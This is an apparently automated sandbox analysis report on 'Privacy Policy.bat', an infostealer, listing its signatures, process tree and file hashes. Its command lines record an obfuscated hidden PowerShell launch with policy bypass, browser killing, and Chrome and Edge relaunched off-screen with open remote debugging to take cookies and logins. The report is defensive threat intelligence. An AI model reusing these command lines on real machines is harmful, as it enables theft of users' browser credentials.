Malware Analysis Report

2025-06-16 00:52

Sample ID 241105-ynezpaznep
Target Privacy Policy.bat
SHA256 306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936
Tags
credential_access discovery spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936

Threat Level: Known bad

The file Privacy Policy.bat was found to be: Known bad.

Malicious Activity Summary

credential_access discovery spyware stealer

Uses browser remote debugging

Blocklisted process makes network request

Drops startup file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 19:55

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 19:55

Reported

2024-11-05 19:58

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Window Explorer.lnk C:\WinExplorer\python.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Window Explorer.lnk C:\WinExplorer\python.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\WinExplorer\python.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\WinExplorer\python.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\WinExplorer\python.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-940901362-3608833189-1915618603-1000\{514C8417-909C-4553-9D9C-FF6E887F6BD7} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3092 wrote to memory of 1688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1688 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3092 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 3092 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 2584 wrote to memory of 3592 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 4852 N/A C:\WinExplorer\python.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 1428 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4216 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 3600 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 3436 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 2500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4616 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 2692 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2584 wrote to memory of 4332 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 1928 N/A C:\WinExplorer\python.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 212 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 4412 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 4036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep by"pas"s -w hid"de"n -enc [Base64-encoded payload omitted]

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4h0a4av0\4h0a4av0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C21.tmp" "c:\Users\Admin\AppData\Local\Temp\4h0a4av0\CSC3C5562825F634D69A2B5ECA051E53882.TMP"

C:\WinExplorer\python.exe

"C:\WinExplorer\python.exe" "C:\WinExplorer\vcruntime140.py"

C:\WinExplorer\python.exe

"C:\WinExplorer\python.exe" "C:\WinExplorer\vcruntime140d.py"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffedd6ccc40,0x7ffedd6ccc4c,0x7ffedd6ccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1960,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1912,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1976 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2052,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2276 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2860,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2872 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2876,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2892 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4048,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4036 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4088,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4060,i,10721512486546995670,1458563507176357446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4116 /prefetch:8

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffecf7546f8,0x7ffecf754708,0x7ffecf754718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,3373648894570296406,11263269810150982776,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4768 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/3092-0-0x00007FFECECA3000-0x00007FFECECA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmwx4n30.4yu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3092-6-0x00000146B04A0000-0x00000146B04C2000-memory.dmp

memory/3092-11-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-12-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4h0a4av0\4h0a4av0.cmdline

MD5 332eb3e049eac1e2da877ddbecf4c891
SHA1 21e6bf14232ecb8f05179f55216d2d54a2b0ac03
SHA256 9ed9e9e7567d61bad439dfffba0aedcfef95c39d53208a38daee3bc272db89b8
SHA512 c95a4cf6c53adc2c8e95a2091f1aeeb2ea3cd4adee2a25e3357bcde850a5a9be58b23475d42dbe0178fa57bc41e3eec1547e4a5119af753173d6d2fa5cfd1e67

\??\c:\Users\Admin\AppData\Local\Temp\4h0a4av0\4h0a4av0.0.cs

MD5 a6e80541a483188dbce2f3d843fcbe4d
SHA1 a1f2e13a3314ab6a676751936c7b3b9a9fb9103e
SHA256 d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9
SHA512 6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

\??\c:\Users\Admin\AppData\Local\Temp\4h0a4av0\CSC3C5562825F634D69A2B5ECA051E53882.TMP

MD5 4a1f2fe3494773c04c02ac0d146c4f0c
SHA1 3b1d175f26f2dfb0e77b7dfd199a334664063a81
SHA256 3ff97bef0c3b3687033293365be29638e6f359ef751d07f4fb3b7d1654c0ffcf
SHA512 755bb3cedde414b3cc43763a8f71fef3806a8957672ab5b7df1acf3b3a2467ebbb10bd96572545ea88a8ecc5bf8d5e77d5df8b9ac3f20c9d1e118e031b7c88e7

C:\Users\Admin\AppData\Local\Temp\RES9C21.tmp

MD5 7b38c415e426522daa598c703d18240f
SHA1 67dd066b8fe158a445382b47eafc42cec3f37833
SHA256 d31dc6af70e86b60cb270d60852854e5b330cdf6721bd22700f30de3cb2f7543
SHA512 83af7f1800512e8697f2008df8ff280f213632d345829a5fbfcb506a7e9bcbd6e5c6d13e27f52acaa2893ad1b888b922754c31930ac13321d81faecba679ab5f

memory/3092-25-0x00000146B0490000-0x00000146B0498000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4h0a4av0\4h0a4av0.dll

MD5 464167d496a09c8eb407f04df3dc2711
SHA1 124be85f1d2c735ae62a0dfa6e74b92b2dfeeef9
SHA256 bb8f362e70fefeaff6f1a7049a7a93b5d14b2d7d6e8d90bfd92619198726b61e
SHA512 f7989aad08c53fc620a4025be930fbec23fb04ba60f2067e4404eb71e3160247dc6089d97b9803a8622268b8aaf15d0e7c48a2a84f0d4973aa996e43f9b23490

memory/3092-27-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-28-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-29-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-30-0x00007FFECECA3000-0x00007FFECECA5000-memory.dmp

memory/3092-31-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-32-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-33-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-34-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

memory/3092-36-0x00000146B0610000-0x00000146B061A000-memory.dmp

memory/3092-37-0x00000146B09B0000-0x00000146B09C2000-memory.dmp

C:\WinExplorer\Lib\site-packages\idna-3.10.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\WinExplorer\Lib\site-packages\pyasn1\codec\der\__init__.py

MD5 0fc1b4d3e705f5c110975b1b90d43670
SHA1 14a9b683b19e8d7d9cb25262cdefcb72109b5569
SHA256 1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d
SHA512 8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\specifiers.py

MD5 7acafe408d6d5dd64238fd689638b177
SHA1 04ffe4f1c2e6d8796ae64b8d3ccd1b9791f31445
SHA256 2d1434905b07ae5e6a7dc14d10426b20562c9c81d05095d8f5f22c6a44ebaea1
SHA512 b3cbe5fd1627f46f3bed6b5d12341d45f42070b5acb37266a6884d2d32e422672f656c00e99aa56894ddc12398e9f76d46c4089095df6c225e5a37f2e5d30f2f

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\tags.py

MD5 e38b04681f4e31b77b316c978f6749bd
SHA1 1a2cecedf2686b5de23beb435957d92894bc990e
SHA256 966b2718d889f02e03fcf7fd3db334aa06d9bc3f64981f65a590505196b747f6
SHA512 6eee7a6b90d1676b18eaa84fa010b348207bc88b7dc206696eba87f85b33cfced6e297e757a95891b609d7e9647b377001507853c8121d93739d20adaeef26a2

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\utils.py

MD5 359296260a63d16f5149ccdd7ae70762
SHA1 5979c6b8353210e327b4689a66207c56a7c8e3d1
SHA256 7498de6addc14be4d89f546b505570b9f50c6ac6edccb7d8468cbf1d710d7854
SHA512 f91a368431fcf74f3214dac61427a3a81188eed8ecd2dd8f3036ec32bf149b0c34837ec965c4a4102b64e37f649df4e90fe4b4104cb46e68b17079b52c5c9401

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\version.py

MD5 8fb00e724a7af8d0b43fa3365fd3eff0
SHA1 161edb467745642554aff7ee33a3eb69ff9e7287
SHA256 fdf2d136b16bc5870755fca8f2f93d8fcb3a24cf0dff1b12c5516be91272728f
SHA512 cc785380e70f1f716079d789de11e4c6b1a5e20003beb9871efecb12c490d4ea64ba0f33d795c07d5de94c2ac66b5802474158bf71358a258b82837bbc1855d3

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\_manylinux.py

MD5 80df840e0ac823fa34bcfa543296ba35
SHA1 0ff6c9ceb0819aef9d68cee59d7942fa0544661f
SHA256 5dc6e25c1faa723bf76dca21a7a37df1332938fe3f8f79be88e03ca6d2b61966
SHA512 cd5bf95d0a51b0f6dac148f0706dc18298a4f3e5b8ed0271af0f54cda46078afe22831d29aa5ab65afa837c0e9f7dc26aaf655af9c2683714eeef0232a4a9848

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\_musllinux.py

MD5 0210636ea49cabb88154105b88045e64
SHA1 d446d94e2b0fe0ec6286292877c3926268ecab4a
SHA256 fca1a063fa9ceef84c1a9a2ab2cdb99f68622c234a46dbf3f660ab4bb824ab27
SHA512 2ffc53a4c2b3600b20c8efe9c92d77ddac659c42c74dbc7abb2478017ac4050d7debc190b134369f4ad8e3d6c53ecf4e06c683938c5bde99dd7675739d6a1c73

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\_structures.py

MD5 de664fedc083927d3d084f416190d876
SHA1 fe0c3747cf14e696276cb6806c6775503de002b8
SHA256 ab77953666d62461bf4b40e2b7f4b7028f2a42acffe4f6135c500a0597b9cabe
SHA512 cff19a724fac387599d98c0a365849078dbcbea65efca1ee445f158268b9241e552212a99e7e0b34394d246e3a06c999a7f1a967f64b2724ca9b623d62996c6f

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\__about__.py

MD5 68d5fc8a7ddb919bb241078b4e4db9cc
SHA1 65369f014ea304064474d47c719401803c999ed8
SHA256 ba001220edb0d685321fcfc23aa4365ffb34ac38636e1402df2268703d378767
SHA512 ba9e26df6282c298bc52f7b1f3b47648118dcb65eaff1cbf0fb17007a39f46787596295e54a097e674af2565c024fb49a1e39a6e44bdfceb20295060b96f2c1f

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\packaging\__init__.py

MD5 b85796f8d9d4e7556c6ad5ec9f0c5371
SHA1 9501323e7783213ab6c7c8e8fd05cd95d7a76ba1
SHA256 6fd2a4e4c17b2b18612e07039a2516ba437e2dab561713dd36e8348e83e11d29
SHA512 eb02053d616708ed5c51da204e1dae2072bb2263e1466024e3bc363a35ceffba509794aec153e6a36cf49474cd73e4f63f3e2daa34d6d18de83fbfb055321263

C:\WinExplorer\Lib\site-packages\setuptools\_vendor\pyparsing\actions.py

MD5 146786b5a4aada43d8288351dc8ef13e
SHA1 1e77e225960e39fd3ef93455425542c211f0e18d
SHA256 c14f62df67b4cb5ca6c4a137394c121cef92148aedd61ff0bfa5acd06423a4d5
